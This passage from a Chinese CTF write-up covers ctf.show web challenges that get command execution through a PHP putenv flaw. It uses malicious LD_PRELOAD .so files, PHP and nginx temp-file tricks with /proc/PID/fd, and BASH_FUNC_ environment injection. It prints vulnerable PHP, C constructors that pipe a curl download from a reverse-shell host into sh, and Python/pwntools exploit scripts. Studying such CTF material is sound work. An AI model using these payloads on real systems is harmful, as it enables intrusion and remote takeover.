<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后使用python脚本跑题目反弹shell：</p>
<pre class="line-numbers language-none"><code class="language-none">import requests
url&#x3D;&quot;http:&#x2F;&#x2F;690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show&#x2F;&quot;
data&#x3D;&#123;&#39;file&#39;:&#39;&#x2F;tmp&#x2F;hack.so&#39;,&#39;content&#39;:open(&#39;hack.so&#39;,&#39;rb&#39;).read()&#125;
requests.post(url+&#39;?a&#x3D;write&#39;,data&#x3D;data)
requests.get(url+&#39;?a&#x3D;run&amp;env&#x3D;LD_PRELOAD&#x3D;&#x2F;tmp&#x2F;hack.so&#39;)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="补充-PHP会产生进程的一些函数"><a href="#补充-PHP会产生进程的一些函数" class="headerlink" title="补充-PHP会产生进程的一些函数"></a>补充-PHP会产生进程的一些函数</h3><p><img src="/images/so/function-process.png" class="lazyload placeholder" data-srcset="/images/so/function-process.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<h3 id="利用LD-PRELOAD劫持构造函数（与上方getuid不同，这个通杀）"><a href="#利用LD-PRELOAD劫持构造函数（与上方getuid不同，这个通杀）" class="headerlink" title="利用LD_PRELOAD劫持构造函数（与上方getuid不同，这个通杀）"></a>利用LD_PRELOAD劫持构造函数（与上方getuid不同，这个通杀）</h3><p>如果十个题目十个不同的函数，那么就要构造十个不同的恶意so文件来劫持，所以思考有没有一种方法可以构造一种恶意so文件就能通杀所有函数。</p>
<h4 id="漏洞代码-2"><a href="#漏洞代码-2" class="headerlink" title="漏洞代码"></a>漏洞代码</h4><pre class="line-numbers language-none"><code class="language-none"> &lt;?php
error_reporting(0);

$action &#x3D; $_GET[&#39;a&#39;];
switch ($action) &#123;
    case &#39;phpinfo&#39;:
        phpinfo();
        break;
    
    case &#39;write&#39;:
        file_put_contents($_POST[&#39;file&#39;],$_POST[&#39;content&#39;]);
        break;

    case &#39;run&#39;:
        putenv($_GET[&#39;env&#39;]);
        mail(&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;);
        break;

    default:
        highlight_file(__FILE__);
        break;
&#125; 
# 其实这题也可以用getuid来劫持<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="利用构造函数constructor编写恶意so文件"><a href="#利用构造函数constructor编写恶意so文件" class="headerlink" title="利用构造函数constructor编写恶意so文件"></a>利用构造函数constructor编写恶意so文件</h4><p>首先写一个construct.c</p>
<pre class="line-numbers language-none"><code class="language-none">#define _GNU_SOURCE

#include&lt;stdlib.h&gt;
#include&lt;stdio.h&gt;
#include&lt;string.h&gt;
__attribute__ ((__constructor__)) void construct(void)
&#123;
	if(getenv(&quot;LD_PRELOAD&quot;)&#x3D;&#x3D;NULL)&#123; return 0;&#125;
    unsetenv(&quot;LD_PRELOAD&quot;);
    system(&quot;curl https:&#x2F;&#x2F;your-shell.com&#x2F;175.178.47.228:8888 | sh&quot;);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>gcc编译构造恶意so文件</p>
<pre class="line-numbers language-none"><code class="language-none">gcc -c -fPIC construct.c -o construct &amp;&amp; gcc --share construct -o construct.so<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>最后就是差不多的代码反弹shell：</p>
<pre class="line-numbers language-none"><code class="language-none">import requests

url&#x3D;&quot;http:&#x2F;&#x2F;acf81259-d67b-47ab-a09b-3ee9c62d8143.challenge.ctf.show&#x2F;&quot;

sodata&#x3D;open(&quot;construct.so&quot;,&quot;rb&quot;).read()
data&#x3D;&#123;
    &quot;file&quot;: &quot;&#x2F;tmp&#x2F;construct.so&quot;,
    &quot;content&quot;: sodata
&#125;
requests.post(url+&quot;?a&#x3D;write&quot;, data&#x3D;data)
requests.get(url+&quot;?a&#x3D;run&amp;env&#x3D;LD_PRELOAD&#x3D;&#x2F;tmp&#x2F;construct.so&quot;)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p><img src="/images/so/conclusion.png" class="lazyload placeholder" data-srcset="/images/so/conclusion.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<h3 id="无上传点利用方式"><a href="#无上传点利用方式" class="headerlink" title="无上传点利用方式"></a>无上传点利用方式</h3><h4 id="思路一-想办法上传文件"><a href="#思路一-想办法上传文件" class="headerlink" title="思路一 想办法上传文件"></a>思路一 想办法上传文件</h4><h5 id="强制上传文件漏洞代码"><a href="#强制上传文件漏洞代码" class="headerlink" title="强制上传文件漏洞代码"></a>强制上传文件漏洞代码</h5><pre class="line-numbers language-none"><code class="language-none">&lt;?php
error_reporting(0);
$env &#x3D; $_GET[&#39;env&#39;];
if(isset($env))&#123;
    putenv($env.scandir(&quot;&#x2F;tmp&quot;)[2]);
    system(&quot;echo ctfshow&quot;);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="文件上传的核心"><a href="#文件上传的核心" class="headerlink" title="文件上传的核心"></a>文件上传的核心</h5><p>文件上传的本质就是数据交换，就是将客户端的数据发送到服务端，服务端对客户端提交的数据进行持久化的过程。所以，即使当前网站可能没有明确的文件上传点，但是，如果仍进行了数据的交互，有数据交互就会有数据的处理，因此就可能会有数据的持久化，所以可以以此来加以利用。</p>
<h5 id="数据交互点"><a href="#数据交互点" class="headerlink" title="数据交互点"></a>数据交互点</h5><p>根据以上思路，我们可以分析出，一个简单的php环境下面的web题目，可能会存在以下数据交互点：</p>
<p>1、协议层数据交互，tcp三次握手。</p>
<p>2、应用层数据交互：</p>
<p>a、客户端的http包发送给服务端的http监听端口</p>
<p>b、服务端的http服务器将包转发给php解释器（PHP-FPM&#x2F;Apache Handler）</p>
<p>很明显在协议层传输室，数据包还没有解包，所以不会进行持久化操作，排除。  </p>
<p>在应用层传输时，会做一些临时文件的保存，有两类：  </p>
<p>1、超过nginx最小的数据处理单元后，数据并没有接收完毕，只能先进行保存，等待数据接收完毕之后在转发出去，在接收数据的这段时间，会有短暂的数据保存。</p>
<p>2、php处理超全局变量$_FILES时，上传的临时文件都是被强制先保存到临时目录，待脚本执行完毕后再删除，这里也有短暂的数据保存。</p>
<h4 id="姿势一-强制上传脚本（web入门-816）"><a href="#姿势一-强制上传脚本（web入门-816）" class="headerlink" title="姿势一 强制上传脚本（web入门-816）"></a>姿势一 强制上传脚本（web入门-816）</h4><p>可以强制上传临时文件到&#x2F;tmp目录下，所以利用前面构造的恶意so文件，写个Python脚本跑两次就行了。</p>
<p>交互代码如下：</p>
<pre class="line-numbers language-none"><code class="language-none">import requests

url &#x3D; &quot;http:&#x2F;&#x2F;48550287-fe2b-4e3b-86ad-024fe1e0e8cb.challenge.ctf.show&#x2F;?env&#x3D;LD_PRELOAD&#x3D;&#x2F;tmp&#x2F;&quot;
files &#x3D; &#123;&#39;file&#39;: open(&#39;construct.so&#39;, &#39;rb&#39;).read()&#125;
requests.post(url, files&#x3D;files)
requests.post(url, files&#x3D;files)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h4 id="姿势二-利用nginx的body缓存机制配合linux特性proc（web入门-817）"><a href="#姿势二-利用nginx的body缓存机制配合linux特性proc（web入门-817）" class="headerlink" title="姿势二 利用nginx的body缓存机制配合linux特性proc（web入门-817）"></a>姿势二 利用nginx的body缓存机制配合linux特性proc（web入门-817）</h4><h5 id="什么是nginx的body缓存机制"><a href="#什么是nginx的body缓存机制" class="headerlink" title="什么是nginx的body缓存机制"></a>什么是nginx的body缓存机制</h5><p>文档：<a target="_blank" rel="noopener" href="http://tengine.taobao.org/nginx_docs/cn/docs/http/ngx_http_core_module.html">http://tengine.taobao.org/nginx_docs/cn/docs/http/ngx_http_core_module.html</a>  </p>
<h5 id="1、client-body-buffer-size"><a href="#1、client-body-buffer-size" class="headerlink" title="1、client_body_buffer_size"></a>1、client_body_buffer_size</h5><pre class="line-numbers language-none"><code class="language-none">client_body_buffer_size
语法: 	client_body_buffer_size size;
默认值: 	client_body_buffer_size 8k|16k;
上下文: 	http, server, location
这里设置读取客户端请求正文的缓冲容量。如果请求正文大于缓冲容量，整个正文或者正文的一部分将写入临时文件。 缓冲大小默认等于两块内存页的大小，在x86平台、其他32位平台和x86-64平台，这个值是8K。在其他64位平台，这个值一般是16K。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>由上面的文档看来可以知道当请求正文一次性超过16k或者8k，就会写入一个临时文件，这个很重要。  </p>
<p>这里写入了一个临时文件，如果能把我们恶意构造的so文件写进去，且知道存储的路径，那么就能通过putenv，设置LD_PRELOAD环境变量就能够执行任意代码了。</p>
<h5 id="2、client-body-in-file-only"><a href="#2、client-body-in-file-only" class="headerlink" title="2、client_body_in_file_only"></a>2、client_body_in_file_only</h5><pre class="line-numbers language-none"><code class="language-none">语法: 	client_body_in_file_only on | clean | off;
默认值: 	client_body_in_file_only off;
上下文: 	http, server, location
决定nginx是否将客户端请求正文整个写入文件。这条指令在调试时，或者使用$request_body_file变量时， 或者使用ngx_http_perl_module模块的 $r-&gt;request_body_file方法时都可以使用。
当指令值设置为on时，请求处理结束后不会删除临时文件。
当指令值设置为clean时，请求处理结束后会删除临时文件。 <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="3、client-body-temp-path"><a href="#3、client-body-temp-path" class="headerlink" title="3、client_body_temp_path"></a>3、client_body_temp_path</h5><pre class="line-numbers language-none"><code class="language-none">语法: 	client_body_temp_path path [level1 [level2[level3]]];
默认值: 	client_body_temp_path client_body_temp;
上下文: 	http, server, location<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>定义存储客户端请求正文的临时文件的目录。 支持在指定目录下多达3层的子目录结构。比如下面配置</p>
<blockquote>
<pre class="line-numbers language-none"><code class="language-none">client_body_temp_path &#x2F;spool&#x2F;nginx&#x2F;client_temp 1 2;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</blockquote>
<p>  存储临时文件的路径是</p>
<blockquote>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;spool&#x2F;nginx&#x2F;client_temp&#x2F;7&#x2F;45&#x2F;00000123457<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</blockquote>
<p>重点关注默认存放位置，是按照顺序存放的，默认的规则如下：  </p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;var&#x2F;lib&#x2F;nginx&#x2F;tmp&#x2F;client_body&#x2F;0000000001
&#x2F;var&#x2F;lib&#x2F;nginx&#x2F;tmp&#x2F;client_body&#x2F;0000000002
&#x2F;var&#x2F;lib&#x2F;nginx&#x2F;tmp&#x2F;client_body&#x2F;0000000003<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h5 id="4、client-max-body-size"><a href="#4、client-max-body-size" class="headerlink" title="4、client_max_body_size"></a>4、client_max_body_size</h5><pre class="line-numbers language-none"><code class="language-none">语法: 	client_max_body_size size;
默认值: 	client_max_body_size 1m;
上下文: 	http, server, location
设置允许客户端请求正文的最大长度。请求的长度由“Content-Length”请求头指定。 如果请求的长度超过设定值，nginx将返回错误413 (Request Entity Too Large)到客户端。 请注意浏览器不能正确显示这个错误。 将size设置成0可以使nginx不检查客户端请求正文的长度。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h5><p>构造一个恶意so文件，首先是需要小于16k，然后手工添加一些无关字节到恶意so文件中，手工膨胀到16k以上，那么这样就有可能将我们的恶意so文件通过缓存机制暂时保存在服务器中。  </p>
<p>但是，也有一个新的问题，在nginx读取完毕之后，转发个php-fpm就删除掉了，也就是在php解释之前就删除了。  </p>
<p>本地测试：</p>
<p>这里可以利用strace来监控流程：  </p>
<pre class="line-numbers language-none"><code class="language-none">trace -f -t -e trace&#x3D;file nginx<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>利用pwntools写代码来发包：  </p>
<pre class="line-numbers language-none"><code class="language-none">from pwn import *
import time

host&#x3D;&#39;127.0.0.1&#39;
port&#x3D;80
url&#x3D;remote(host,port)
def getso():
	with open(&quot;hack.so&quot;,&quot;rb&quot;) as f:
		ret&#x3D;f.read()
	return ret

payload&#x3D;getso()+b&#39;\n&#39;*30*1024

send&#x3D;&#39;&#39;&#39;POST &#x2F; HTTP&#x2F;1.1\r
Host:&#123;host&#125;\r
Content-Length:&#123;length&#125;\r
\r
&#123;data&#125;
&#39;&#39;&#39;.format(host&#x3D;host.length&#x3D;len(payload),data&#x3D;payload)
url.send(send)
time.sleep(10)
url.close()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这样子本地测试可以知道nginx的确会生成缓存文件，并且在十秒钟断开连接后就会使用unlink把它删除。</p>
<p>所以我们此时并不能够直接LD_PRELOAD&#x3D;&#x2F;var&#x2F;lib&#x2F;nginx&#x2F;tmp&#x2F;0000000001来访问这个缓存文件，因为到php解释执行时，unlink早已被执行，文件已经不存在了。  </p>
<p>但是通过监控发现，直接生成之后，会被马上删除掉，但是删除掉之后居然能够继续修改和访问？如图所示：  </p>
<p><img src="/images/so/delete-modify.png" class="lazyload placeholder" data-srcset="/images/so/delete-modify.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<p>因此我们思考是否可以利用linux的特性来使用<code>/proc/PID/fd/&#123;1&#125;</code>这种文件！  </p>
<p>答案是可以但是有一定限制条件：  </p>
<p>必须使用相同用户名执行php和nginx才可以，默认php执行用户名为www-data，而nginx的&#x2F;proc&#x2F;PID&#x2F;fd目录的所有者为nginx的执行用户，默认为nginx，如果两个用户权限不同的情况下是不能直接访问的。  </p>
<h5 id="proc"><a href="#proc" class="headerlink" title="proc"></a>proc</h5><p>关于proc：<a target="_blank" rel="noopener" href="https://blog.csdn.net/shenhuxi_yu/article/details/79697792">https://blog.csdn.net/shenhuxi_yu/article/details/79697792</a></p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;proc 是一个伪文件系统, 被用作内核数据结构的接口, 而不仅仅是解释说明&#x2F;dev&#x2F;kmem.
&#x2F;proc 里的大多数文件都是只读的, 但也可以通过写一些文件来改变内核变量.
(
Linux 内核提供了一种通过 &#x2F;proc 文件系统，在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统，它只存在内存当中，而不占用外存空间。它以文件系统的方式为访问系统内核数据的操作提供接口。
用户和应用程序可以通过proc得到系统的信息，并可以改变内核的某些参数。由于系统的信息，如进程，是动态改变的，所以用户或应用程序读取proc文件时，proc文件系统是动态从系统内核读出所需信息并提交的。下面列出的这些文件或子文件夹，并不是都是在你的系统中存在，这取决于你的内核配置和装载的模块。另外，在&#x2F;proc下还有三个很重要的目录：net，scsi和sys。 Sys目录是可写的，可以通过它来访问或修改内核的参数，而net和scsi则依赖于内核配置。例如，如果系统不支持scsi，则scsi 目录不存在。
除了以上介绍的这些，还有的是一些以数字命名的目录，它们是进程目录。系统中当前运行的每一个进程都有对应的一个目录在&#x2F;proc下，以进程的 PID号为目录名，它们是读取进程信息的接口。而self目录则是读取进程本身的信息接口，是一个link。
)
&#x2F;proc&#x2F;pid&#x2F;fd&#x2F; 这个目录包含了进程打开的每一个文件的链接；<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="漏洞代码-3"><a href="#漏洞代码-3" class="headerlink" title="漏洞代码"></a>漏洞代码</h5><pre class="line-numbers language-none"><code class="language-none">$file &#x3D; $_GET[&#39;file&#39;];
if(isset($file) &amp;&amp; preg_match(&quot;&#x2F;^\&#x2F;(\w+\&#x2F;?)+$&#x2F;&quot;, $file))&#123;
	shell_exec(shell_exec(&quot;cat $file&quot;));
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="joker大师傅写的全自动反弹shell脚本"><a href="#joker大师傅写的全自动反弹shell脚本" class="headerlink" title="joker大师傅写的全自动反弹shell脚本"></a>joker大师傅写的全自动反弹shell脚本</h5><pre class="line-numbers language-none"><code class="language-none"># -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-04-28 22:35:19
# @Last Modified by:   h1xa
# @Last Modified time: 2022-04-29 00:23:30
# @email: h1xa@ctfer.com
# @link: https:&#x2F;&#x2F;ctfer.com


from pwn import *
import time
import threading


host &#x3D; &quot;pwn.challenge.ctf.show&quot;
port &#x3D; 28166
#反弹shell地址和端口
your_shell&#x3D;&#39;https:&#x2F;&#x2F;your-shell.com&#x2F;IP地址:端口&#39;
#context.log_level &#x3D; &#39;debug&#39;


def writeBuff():
	url &#x3D; remote(host,port)
	payload &#x3D; &#39;curl &#39;+your_shell+&#39; |sh &amp;&amp; echo &#39;+&#39;A&#39;*16*1024
	send &#x3D; &#39;&#39;&#39;GET &#x2F;index.php HTTP&#x2F;1.1\r
Host:&#123;host&#125;:&#123;port&#125;\r
Content-Length:&#123;length&#125;\r
\r
&#123;data&#125;&#39;&#39;&#39;.format(host&#x3D;host,port&#x3D;port,length&#x3D;len(payload)*2,data&#x3D;payload)
	url.send(send)
	time.sleep(60)
	url.close()
	log.success(&quot;writeBuff done&quot;)
	exit()


def readBuff(pid,fd):
	url &#x3D; remote(host,port)
	send &#x3D; &#39;&#39;&#39;GET &#x2F;index.php?file&#x3D;&#x2F;proc&#x2F;&#123;pid&#125;&#x2F;fd&#x2F;&#123;fd&#125; HTTP&#x2F;1.1\r
Host:&#123;host&#125;:&#123;port&#125;\r
\r
&#39;&#39;&#39;.format(host&#x3D;host,port&#x3D;port,fd&#x3D;fd,pid&#x3D;pid)
	url.send(send)
	url.close()

def forceBuff(pid):
	for j in range(10,15):
		log.info(f&quot;readBuff(&#123;pid&#125;,&#123;j&#125;)&quot;)
		readBuff(pid,j)


def run():
	wb &#x3D; threading.Thread(target&#x3D;writeBuff)

	wb.start()
	time.sleep(3)
	log.progress(&quot;writeBuff thread starting...&quot;)
	forceBuff(117)
	log.progress(f&quot;readBuff thread starting...&quot;)
	log.success(&quot;execute done&quot;)
	exit()

def main():
	run()


if __name__ &#x3D;&#x3D; &#39;__main__&#39;:
	main()
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h4 id="姿势三-利用nginx的fastcgi的临时文件"><a href="#姿势三-利用nginx的fastcgi的临时文件" class="headerlink" title="姿势三 利用nginx的fastcgi的临时文件"></a>姿势三 利用nginx的fastcgi的临时文件</h4><p>和姿势二大同小异，区别就是<strong>反向缓存</strong>。即当php-fpm返回处理后的较大数据时，超过nginx的缓冲区大小的时候，就会保存文件。  </p>
<p>joker师傅说条件利用苛刻，所以没讲。</p>
<h4 id="姿势四-利用nginx的body缓存配合LD-PRELOAD执行恶意so文件（web入门-818）"><a href="#姿势四-利用nginx的body缓存配合LD-PRELOAD执行恶意so文件（web入门-818）" class="headerlink" title="姿势四 利用nginx的body缓存配合LD_PRELOAD执行恶意so文件（web入门-818）"></a>姿势四 利用nginx的body缓存配合LD_PRELOAD执行恶意so文件（web入门-818）</h4><h5 id="题目漏洞源码"><a href="#题目漏洞源码" class="headerlink" title="题目漏洞源码"></a>题目漏洞源码</h5><pre class="line-numbers language-none"><code class="language-none">$env &#x3D; $_GET[&#39;env&#39;];
if(isset($env))&#123;
	putenv($env);
	system(&quot;echo ctfshow&quot;);
&#125;else&#123;
	system(&quot;ps aux&quot;);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这里跟上面那题大同小异，上面的题目是直接缓存了我们的shell，而这题我们需要直接缓存一个恶意的so文件。  </p>
<h5 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h5><p>恶意的so文件使用上面做过的题目生成的就行了，也可</p>
<pre class="line-numbers language-none"><code class="language-none">#include&lt;stdlib.h&gt;
#include&lt;stdio.h&gt;
#include&lt;string.h&gt;
__attribute__ ((__constructor__)) void preload(void)
&#123;
    unsetenv(&quot;LD_PRELOAD&quot;);
    system(&quot;curl https:&#x2F;&#x2F;your-shell.com&#x2F;175.178.47.228:8888 | sh&quot;);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>以用下面的c文件生成</p>
<pre class="line-numbers language-none"><code class="language-none"># -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-04-27 12:43:50
# @Last Modified by:   h1xa
# @Last Modified time: 2022-04-29 12:03:02
# @email: h1xa@ctfer.com
# @link: https:&#x2F;&#x2F;ctfer.com


from pwn import *
import time
import threading
import requests


host &#x3D; &quot;pwn.challenge.ctf.show&quot;
port &#x3D; 28120
context.log_level &#x3D; &#39;debug&#39;

def getSo():
	with open(&quot;exp.so&quot;,&quot;rb&quot;) as f:
		ret &#x3D; f.read()
	return ret

def writeBuff():
	url &#x3D; remote(host,port)
	payload &#x3D; getSo()
	send &#x3D; &#39;&#39;&#39;GET &#x2F;index.php HTTP&#x2F;1.1\r
Host:&#123;host&#125;:&#123;port&#125;\r
Content-Length:&#123;length&#125;\r
\r
&#39;&#39;&#39;.format(host&#x3D;host,port&#x3D;port,length&#x3D;len(payload)*2)

	url.send(send)
	url.send(payload)
	time.sleep(60)
	url.close()
	log.success(&quot;writeBuff done&quot;)
	exit()

def readBuff(pid,fd):
	url &#x3D; &#39;&#39;&#39;http:&#x2F;&#x2F;&#123;host&#125;:&#123;port&#125;&#x2F;index.php?env&#x3D;LD_PRELOAD&#x3D;&#x2F;proc&#x2F;&#123;pid&#125;&#x2F;fd&#x2F;&#123;fd&#125;&#39;&#39;&#39;.format(host&#x3D;host,port&#x3D;port,fd&#x3D;fd,pid&#x3D;pid)
	requests.get(url)


def forceBuff(pid):
	for j in range(10,15):
		log.info(f&quot;readBuff(&#123;pid&#125;,&#123;j&#125;)&quot;)
		readBuff(pid,j)
		time.sleep(1)

def run():
	wb &#x3D; threading.Thread(target&#x3D;writeBuff)
	wb.start()
	time.sleep(3)
	log.progress(&quot;writeBuff thread starting...&quot;)
	forceBuff(117)
	log.progress(f&quot;readBuff thread starting...&quot;)
	log.success(&quot;execute done&quot;)
	exit()


def main():
	run()


if __name__ &#x3D;&#x3D; &#39;__main__&#39;:
	main()

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="思路二-想办法利用环境变量（web入门-819）"><a href="#思路二-想办法利用环境变量（web入门-819）" class="headerlink" title="思路二 想办法利用环境变量（web入门-819）"></a>思路二 想办法利用环境变量（web入门-819）</h4><h5 id="漏洞代码-4"><a href="#漏洞代码-4" class="headerlink" title="漏洞代码"></a>漏洞代码</h5><pre class="line-numbers language-none"><code class="language-none">$env &#x3D; $_GET[&#39;env&#39;];
if(isset($env))&#123;
    putenv($env);
    system(&quot;whoami&quot;);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>前面的题使用的是pwn的模式，转发端口，这题是一个正常的页面，会经过层层的流量转发，所以不能进行一个临时文件的写入了，所以得另外考虑新的方式。所以这里从putenv这里开始突破。  </p>
<h5 id="php的system函数"><a href="#php的system函数" class="headerlink" title="php的system函数"></a>php的system函数</h5><p>跟进php的system的底层c代码可以知道，php首先调用了VCWD_POPEN方法，又定义了宏。这里是调用了glibc的popen函数，跟进glibc的源代码，可以看到popen是如何实现的，看到了执行了sh -c命令，在centos下，由于sh指向bash，所以就是执行了bash -c命令。</p>
<h5 id="bash与环境变量"><a href="#bash与环境变量" class="headerlink" title="bash与环境变量"></a>bash与环境变量</h5><p>那么就思考能否控制bash所引用的环境变量，从而实现代码执行。bash在设计时，有这么一个功能，就是可以通过环境变量来初始化一个匿名函数，并给他命名。如下所示：</p>
<pre class="line-numbers language-none"><code class="language-none">name&#x3D;func
content&#x3D;() &#123;:;&#125;
那么合起来为func&#x3D;() &#123;:;&#125;
我们再把该函数注册进去，怎么注册呢，这里利用的是类似php的eval函数。
类似于：eval(func&#x3D;() &#123;:;&#125;)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="破壳漏洞"><a href="#破壳漏洞" class="headerlink" title="破壳漏洞"></a>破壳漏洞</h5><pre class="line-numbers language-none"><code class="language-none">name&#x3D;func
content&#x3D;hack&#x3D;() &#123;:;&#125;;id
所以合起来就变为：
eval(func&#x3D;hack&#x3D;() &#123;:;&#125;;id)
通过一个分号，前面的函数定义完毕之后，随即就执行了后面的id方法。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>官方修复：</p>
<pre class="line-numbers language-none"><code class="language-none">规定：
函数名必须有前缀
函数体必须有前缀
只执行前缀以后，后缀之前的内容
函数体必须以()&#123;开头，函数名BASH_FUNC_开头，并且以%%结尾<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="再看题目"><a href="#再看题目" class="headerlink" title="再看题目"></a>再看题目</h5><p>有破壳漏洞的思路进行思考，我们可以通过这个putenv，在通过设置环境变量的时候注册一个函数，通过移花接木将whoami命令覆盖为bash命令来执行。  </p>
<p>所以开始根据官方的规定进行合理的构造：</p>
<pre class="line-numbers language-none"><code class="language-none">BASH_FUNC_whoami%%&#x3D;() &#123; id; &#125;
?env&#x3D;BASH_FUNC_whoami%%&#x3D;() &#123; id; &#125;
传给env，直接执行成功！！！<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>注意：</p>
<pre class="line-numbers language-none"><code class="language-none">如果ubuntu的sh指向dsh，alpine的sh指向ash，那么上面的姿势是无法利用的。<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="无上传点总结"><a href="#无上传点总结" class="headerlink" title="无上传点总结"></a>无上传点总结</h3><p>能够控制环境变量，但是无文件上传点，可以利用的多种姿势如下：  </p>
<p>1、利用php的$_FILES机制，使用临时文件注入恶意的so文件。  </p>
<p>2、利用nginx的body缓存机制，一是直接传shell，另外一个是传恶意so。  </p>
<p>3、利用nginx的fastcgi缓存。（joker师傅没讲  </p>
<p>4、利用bash的环境变量注册匿名函数。</p>

      </div>
      <div class="post-tags-categories">
        
        <div class="tags">
          
            <a href="/tags/ctf/" class="">
              ctf
            </a>
          
            <a href="/tags/php/" class="">
              php
            </a>
          
        </div>
        
      </div>
      
        <div class="copyright">
  <ul class="post-copyright">
    <li class="post-copyright-author">
    <strong>作者:  </strong>Sakura501</a>
    </li>
    <li class="post-copyright-link">
    <strong>文章链接:  </strong>
    <a href="/2022/04/28/hua-shi-gou-zao-e-yi-so-wen-jian/" target="_blank" title="花式构造恶意so文件">http://sakura-501.github.io/2022/04/28/hua-shi-gou-zao-e-yi-so-wen-jian/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明:   </strong>
      本网站所有文章除特别声明外,均采用 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">CC BY-NC-ND 4.0</a>
      许可协议。转载请注明出处!
    </li>
  </ul>
<div>
      
    </article>
    <!-- 上一篇文章和下一篇文章 -->
    
      <!-- 文章详情页的上一页和下一页 -->
<div class="post-nav">



  
  <div class="post-nav-prev post-nav-item">
    <div class="post-nav-img" style="background-size: cover; 
      background-position: center center;">
